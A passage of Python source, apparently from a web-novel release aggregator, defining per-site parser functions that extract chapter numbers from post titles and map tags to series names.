		(('World of Immortals',),                   'World of Immortals',                     None),
		(('Bu ni mi',),                             'Bu ni mi',                               None),
		(('Rinkan no Madoushi',),                   'Rinkan no Madoushi',                     None),
		(('Arifureta',),                            'Arifureta Shokugyou de Sekai Saikyou',   None),
		(('High Comprehension Low Strength',),      'High Comprehension Low Strength',        None),
		(('Martial Void King',),                    'Martial Void King',                      None),
		(('Very Pure and Ambiguous',),              'Very Pure and Ambiguous: The Prequel',   None),
	]
	for tags, series, tl_type in series_table:
		if any(tag in item['tags'] for tag in tags):
			if tl_type:
				return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOriginNovels(item):
	'''
	Parse releases from Origin Novels (OEL).
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# Text after the last en-dash in the title is the chapter name.
	dash_parts = item['title'].split("–")
	if len(dash_parts) > 1:
		postfix = dash_parts[-1]
	if 'True Identity' in item['tags']:
		return buildReleaseMessage(item, 'True Identity', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractOutspanFoster(item):
	'''
	Parse releases from Outspan Foster (OEL original).
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	is_release = "Chapter" in item['tags'] and 'ascension' in item['tags']
	if is_release:
		return buildReleaseMessage(item, 'The Ascension Chronicle', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTsukigomori(item):
	'''
	Parse releases from Tsukigomori.

	Note: unlike most handlers in this file, fragment-only numbering is
	accepted and there is no "preview" rejection.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol or frag):
		return False
	# Each series uses its tag verbatim as the series name.
	for series in ('Our Glamorous Time', 'Same Place Not Same Bed'):
		if series in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSutekiDaNe(item):
	'''
	Parse releases from Suteki Da Ne.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	series_for_tag = {
		'Can I Not Marry?': 'Can I Not Marry? / Days of Cohabitation with the President',
		"Black Bellied Prince's Stunning Abandoned Consort": "Black Bellied Prince's Stunning Abandoned Consort",
	}
	for tag, series in series_for_tag.items():
		if tag in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSilentTl(item):
	'''
	Parse releases from Silent Translations (single series).
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	if 'Legend' not in item['tags']:
		return False
	return buildReleaseMessage(item, "Legend", vol, chp, frag=frag, postfix=postfix)
####################################################################################################################################################
#
####################################################################################################################################################
def extractTranslatingZeTianJi(item):
	'''
	Parse releases from the single-series Ze Tian Ji translation site;
	every qualifying post is attributed to that series.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	# NOTE(review): the trailing space in "Ze Tian Ji " is reproduced as-is;
	# confirm whether downstream series-name matching strips whitespace
	# before tidying it up.
	return buildReleaseMessage(item, "Ze Tian Ji ", vol, chp, frag=frag, postfix=postfix)
####################################################################################################################################################
#
####################################################################################################################################################
def extractSoojikisProject(item):
	'''
	Parse releases from Soojiki's Project.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	tags = item['tags']
	# Skeleton releases are sometimes only tagged 'Home page'.
	if 'Weakest Skeleton' in tags or 'Home page' in tags:
		return buildReleaseMessage(item, 'Kurasu marugoto jingai tensei -Saijyaku no sukeruton ni natta ore-', vol, chp, frag=frag, postfix=postfix)
	if 'Reincarnated as a Villager' in tags:
		return buildReleaseMessage(item, 'Reincarnated as a Villager ~ Strongest Slow-life', vol, chp, frag=frag, postfix=postfix)
	# This series is identified by the combination of two tags.
	if 'Yandere?' in tags and 'Weapons' in tags:
		return buildReleaseMessage(item, 'Myself, weapons, and Yandere', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractProjectAccelerator(item):
	'''
	Parse releases from Project Accelerator.

	Keeps this handler group's convention of returning None (rather than
	False) when the post carries no chapter/volume/fragment info.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol or frag):
		return None
	if 'Black Healer' in item['tags']:
		return buildReleaseMessage(item, 'Black Healer', vol, chp, frag=frag, postfix=postfix)
	return False
def extractPrideXReVamp(item):
	'''
	Stub handler for 'Pride X ReVamp': parses numbering but maps no series
	yet, so it never emits a release.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol or frag):
		return None
	return False
def extractRaisingAngelsDefection(item):
	'''
	Stub handler: parses numbering but maps no series yet, so it never
	emits a release.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol or frag):
		return None
	return False
def extractProcrasTranslation(item):
	'''
	Release parser for 'ProcrasTranslation'. Only the 'Slowlife' tag is
	routed to a series.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if 'Slowlife' in item['tags']:
		return buildReleaseMessage(item, 'Tensei Shite Inaka de Slowlife wo Okuritai', vol, chp, frag=frag, postfix=postfix)
	return False
def extractPeaTranslation(item):
	'''
	Release parser for 'Pea Translation'. No series are mapped for this
	group yet, so numbered posts still fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractPekaboBlog(item):
	'''
	Release parser for 'Pekabo Blog'. No series are mapped for this
	group yet, so numbered posts still fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTerminusTranslation(item):
	'''
	Release parser for 'Terminus Translation'. No series are mapped for
	this group yet, so numbered posts still fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTaint(item):
	'''
	Release parser for the OEL serial 'Taint'. Numbering may appear in
	the tags rather than the title, so both are fed to the shared parser.
	NOTE(review): unlike the sibling parsers, the early-out here fires
	only when numbering is missing AND the title is not a preview —
	preserved as-is since changing it would alter which posts pass.
	'''
	tags = item['tags']
	searchable = item['title'] + " ".join(tags)
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(searchable)
	if not (vol or chp or frag) and "preview" not in item['title']:
		return False
	if 'Chapter Release' in tags and 'Taint' in tags:
		if 'Main Story' in tags:
			return buildReleaseMessage(item, 'Taint', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
		if 'Side Story' in tags:
			postfix = "Side Story"
			return buildReleaseMessage(item, 'Taint', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractUselessno4(item):
	'''
	Release parser for 'Uselessno4', routed on the title prefix.
	'Paladin' posts number chapters as "X-Y" (chapter-part); the part is
	recovered by hand when the shared parser did not yield a fragment.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if title.startswith('Skeleton Knight '):
		return buildReleaseMessage(item, 'Skeleton Knight, in another world', vol, chp, frag=frag, postfix=postfix)
	if title.startswith('1000 hugs '):
		return buildReleaseMessage(item, '1000 nin no Homunkurusu no Shoujo tachi ni Kakomarete Isekai Kenkoku', vol, chp, frag=frag, postfix=postfix)
	if title.startswith('Paladin '):
		match = re.search(r'(\d+)\-(\d+)', title, re.IGNORECASE)
		if match and not frag:
			chp = int(match.group(1))
			frag = int(match.group(2))
		return buildReleaseMessage(item, 'Paladin of the End', vol, chp, frag=frag, postfix=postfix)
	return False
def extractPettankoTranslations(item):
	'''
	Release parser for 'Pettanko Translations'. A single series is
	recognized by its title prefix.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if title.startswith('Isekai C-mart Hanjouki'):
		return buildReleaseMessage(item, 'Isekai C-mart Hanjouki', vol, chp, frag=frag, postfix=postfix)
	return False
def extractQualityMistranslations(item):
	'''
	Release parser for 'Quality Mistranslations'. No series are mapped
	for this group yet, so numbered posts still fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractShell2lyCNovelSite(item):
	'''
	Release parser for 'Shell2ly C-Novel Site'. Part numbers are written
	in parentheses after the chapter (e.g. "(2)"), so a fallback regex
	recovers the fragment when the shared parser missed it.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if not frag:
		paren_num = re.search(r'\((\d+)\)', title)
		if paren_num:
			frag = int(paren_num.group(1))
	if 'MMSTEM' in item['tags']:
		return buildReleaseMessage(item, 'Madam, Master Said to Eat Meal', vol, chp, frag=frag, postfix=postfix)
	return False
def extractOregaHeroineinEnglish(item):
	'''
	Release parser for 'Orega Heroine in English'. No series are mapped
	for this group yet, so numbered posts still fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSnowyPublications(item):
	'''
	Release parser for 'Snowy Publications'. New-release announcements
	map to the group's single OEL serial.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if 'New Release: ' in title:
		return buildReleaseMessage(item, 'Whisper of the Nightingale', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
def extractPandorasBook(item):
	'''
	Release parser for 'Pandora's Book'. No series are mapped for this
	group yet, so numbered posts still fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSlothTranslationsBlog(item):
	'''
	Release parser for 'Sloth Translations Blog'. Two series are
	recognized by title prefix (one case-insensitively).
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if title.startswith("Re:Master Magic "):
		return buildReleaseMessage(item, 'The Mage Will Master Magic Efficiently In His Second Life', vol, chp, frag=frag, postfix=postfix)
	if title.lower().startswith("blacksmith chapter "):
		return buildReleaseMessage(item, 'Botsuraku youtei nanode, Kajishokunin wo mezasu', vol, chp, frag=frag, postfix=postfix)
	return False
def extractPatriarchReliance(item):
	'''
	Release parser for 'Patriarch Reliance'. Heuristic: a bare
	"Chapter N" title with no other prefix is assumed to be a
	'God and Devil World' release.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if re.match(r"Chapters? \d+", title):
		return buildReleaseMessage(item, 'God and Devil World', vol, chp, frag=frag, postfix=postfix)
	return False
def extractTentativelyUnderconstruction(item):
	'''
	Release parser for 'Tentatively Underconstruction'. No series are
	mapped for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTwig(item):
	'''
	Release parser for 'Twig'. No series are mapped for this group yet,
	so numbered posts still fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSunShowerFields(item):
	'''
	Release parser for 'SunShower Fields'. No series are mapped for this
	group yet, so numbered posts still fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTinkerbellsan(item):
	'''
	Release parser for 'Tinkerbell-san'. For every mapped series the
	post tag is exactly the series title, so routing is a simple scan.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	for series in ('Caught in my Own Trap',
				'Finding Glowing Beauty in Books',
				'Boss’s Blind Date Notes'):
		if series in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	return False
def extractPenguinOverlordTranslations(item):
	'''
	Release parser for 'Penguin Overlord Translations'. No series are
	mapped for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractPactWebSerial(item):
	'''
	Release parser for the 'Pact' web serial feed. No series are mapped
	for this source yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTatakauShishoLightNovelTranslation(item):
	'''
	Release parser for 'Tatakau Shisho Light Novel Translation'. No
	series are mapped yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractShokyuuTranslations(item):
	'''
	Release parser for 'Shokyuu Translations'. No series are mapped for
	this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractPriddlesTranslations(item):
	'''
	Release parser for 'Priddles Translations'. Routed purely on the
	'Magic is Japanese' tag.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp):
		return False
	if 'Magic is Japanese' in item['tags']:
		return buildReleaseMessage(item, 'Magic is Japanese', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTyrantsEyeTranslations(item):
	'''
	Release parser for 'Tyrant's Eye Translations'. No series are mapped
	for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTheLastSkull(item):
	'''
	Release parser for 'The Last Skull'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTranslationsFromOuterSpace(item):
	'''
	Release parser for 'Translations From Outer Space'. No series are
	mapped for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractRuisTranslations(item):
	'''
	Release parser for 'Rui's Translations'. A single series is routed
	by its (identically-named) tag.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if 'A Mismatched Marriage: Records of Washed Away Injustices' in item['tags']:
		return buildReleaseMessage(item, 'A Mismatched Marriage: Records of Washed Away Injustices', vol, chp, frag=frag, postfix=postfix)
	return False
def extractSenjiQcreations(item):
	'''
	Release parser for 'SenjiQ creations'. Posts tagged both 'Sandstorm'
	and 'Release' map to the group's OEL serial.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	tags = item['tags']
	if 'Sandstorm' in tags and 'Release' in tags:
		return buildReleaseMessage(item, 'Sandstorm Story', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
def extractPsicernTranslations(item):
	'''
	Release parser for 'Psicern Translations'. No series are mapped for
	this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSymbiote(item):
	'''
	Release parser for 'Symbiote'. No series are mapped for this group
	yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractUnlimitedStoryWorks(item):
	'''
	Release parser for 'Unlimited Story Works'. No series are mapped for
	this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTalesOfPaulTwister(item):
	'''
	Release parser for the OEL 'The Tales of Paul Twister' universe.
	The sequel arcs are folded into one series, with the arc tag mapped
	to a volume number; the feed itself never carries a volume, which
	the assert documents.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp):
		return False
	for arc_tag, arc_vol in (('The Fate of Paul Twister', 2),
							('The Return of Paul Twister', 3)):
		if arc_tag in item['tags']:
			assert not vol
			vol = arc_vol
			return buildReleaseMessage(item, 'The Tales of Paul Twister', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractRejectHero(item):
	'''
	Release parser for 'Reject Hero'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractReiTransBlog(item):
	'''
	Release parser for 'ReiTrans Blog'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractRealmOfChaos(item):
	'''
	Release parser for 'Realm of Chaos'. 'Myriad of Shades' posts are
	tagged with the POV character(s); those tags are collected into the
	release postfix (with any parsed postfix appended after a dash).
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if 'Myriad of Shades' in item['tags']:
		known = ['Celest Ambrosia', 'Kiriko', 'Melanie Ambrosia', 'Shana Bonnet', 'Silvia', 'XCrossJ', 'Ghost']
		pov_tags = [tag for tag in item['tags'] if tag in known]
		postfix_out = ", ".join(pov_tags)
		if postfix:
			postfix_out += " - " + postfix
		return buildReleaseMessage(item, 'Myriad of Shades', vol, chp, frag=frag, postfix=postfix_out, tl_type='oel')
	return False
def extractTieshaunn(item):
	'''
	Release parser for 'Tieshaunn'. No series are mapped for this group
	yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSTLTranslations(item):
	'''
	Release parser for 'STL Translations'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTowardsTheSky(item):
	'''
	Release parser for 'Towards the Sky~'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSinsOfTheFathers(item):
	'''
	Release parser for the OEL serial 'Sins of the Fathers'. Every post
	with a parsed chapter or volume number is treated as a release of
	the single series.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol) or "preview" in item['title'].lower():
		return False
	# Bug fix: the series name was previously passed as
	# 'Sins of the Fathers '.lower(), emitting a lower-cased title with a
	# trailing space. Use the properly-cased, trimmed title instead.
	return buildReleaseMessage(item, 'Sins of the Fathers', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
####################################################################################################################################################
#
####################################################################################################################################################
def extractTofubyu(item):
	'''
	Release parser for 'Tofubyu'. No series are mapped for this group
	yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSkullSquadron(item):
	'''
	Release parser for 'Skull Squadron'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSuperPotatoTranslations(item):
	'''
	Release parser for 'Super Potato Translations'. No series are mapped
	for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractU3000(item):
	'''
	Release parser for 'U3000'. No series are mapped for this group yet;
	numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractStarrydawnTranslations(item):
	'''
	Release parser for 'Starrydawn Translations'. No series are mapped
	for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSnowTranslations(item):
	'''
	Release parser for 'Snow Translations'. No series are mapped for
	this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTalesofTheForgottenslayer(item):
	'''
	Release parser for 'Tales of The Forgotten slayer'. One OEL serial
	is routed by its (lower-cased) tag.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if 'the botched summoning' in item['tags']:
		return buildReleaseMessage(item, 'The Botched Summoning', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	return False
def extractShermaTranslations(item):
	'''
	Release parser for 'Sherma Translations'. No series are mapped for
	this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractPumpkinTranslations(item):
	'''
	Release parser for 'Pumpkin Translations'. No series are mapped for
	this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractPremiumRedTea(item):
	'''
	Release parser for 'Premium Red Tea'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTseirpTranslations(item):
	'''
	Release parser for 'Tseirp Translations'. Series are keyed on short
	title prefixes ("IS ", "GC ") or the 'Live Dungeon' tag; "IS SS"
	posts are side stories, flagged through the postfix.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	if not postfix and 'IS SS' in title:
		postfix = "Side Story"
	if title.startswith("IS "):
		return buildReleaseMessage(item, 'Invincible Saint ~Salaryman, the Path I Walk to Survive in This Other World~', vol, chp, frag=frag, postfix=postfix)
	if title.startswith("GC "):
		return buildReleaseMessage(item, 'I\'ve Became Able to Do Anything With My Growth Cheat, but I Can\'t Seem to Get Out of Being Jobless', vol, chp, frag=frag, postfix=postfix)
	if 'Live Dungeon' in item['tags']:
		return buildReleaseMessage(item, 'Live Dungeon', vol, chp, frag=frag, postfix=postfix)
	return False
def extractStoneBurners(item):
	'''
	Release parser for 'Stone Burners'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractPandafuqTranslations(item):
	'''
	Release parser for 'Pandafuq Translations'. Titles format parts as
	"Name {chapter} ({frag})", which the shared parser mishandles, so no
	releases are emitted for this source yet.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp):
		return False
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractPippiSite(item):
	'''
	Release parser for 'Pippi Site'. 'First Marriage Then Love' releases
	are recognized by the "FMTL – Chapter" marker in the title.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp):
		return False
	if 'FMTL – Chapter' in title:
		return buildReleaseMessage(item, 'First Marriage Then Love', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractSweetACollections(item):
	'''
	Release parser for 'Sweet A Collections'. No series are mapped for
	this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractRoastedTea(item):
	'''
	Release parser for 'Roasted Tea'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSpringScents(item):
	'''
	Release parser for 'Spring Scents'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractOpinisaya(item):
	'''
	Release parser for 'Opinisaya.com'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTaidadonoTranslations(item):
	'''
	Release parser for 'Taidadono Translations'. No series are mapped
	for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSaurisTLBlog(item):
	'''
	Release parser for 'Sauris TL Blog'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSilverButterfly(item):
	'''
	Release parser for 'Silver Butterfly'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTheSphere(item):
	'''
	Release parser for 'The Sphere'. No series are mapped for this group
	yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractSnowDust(item):
	'''
	Release parser for 'Snow Dust'. No series are mapped for this group
	yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractRiptranslations(item):
	'''
	Release parser for 'Rip translations'. No series are mapped for this
	group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractTheBeginningAfterTheEnd(item):
	'''
	Release parser for the OEL serial 'The Beginning After The End'.
	When the shared parser yields no postfix, anything after the last
	":" in the title is used as the chapter postfix.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp):
		return False
	if not postfix and ":" in title:
		postfix = title.split(":")[-1]
	return buildReleaseMessage(item, 'The Beginning After The End', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
####################################################################################################################################################
#
####################################################################################################################################################
def extractSoltarinationScanlations(item):
	'''
	Release parser for 'Soltarination Scanlations'. No series are mapped
	for this group yet; numbered posts fall through to False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (vol or chp or frag):
		return None
	return False
def extractRosyFantasy(item):
	'''
	Release parser for 'Rosy Fantasy'. Most series are tagged with their
	exact title, so routing is a simple scan; 'Demon Wang's Golden
	Favorite Fei' additionally matches two tag spellings and a title
	acronym.
	'''
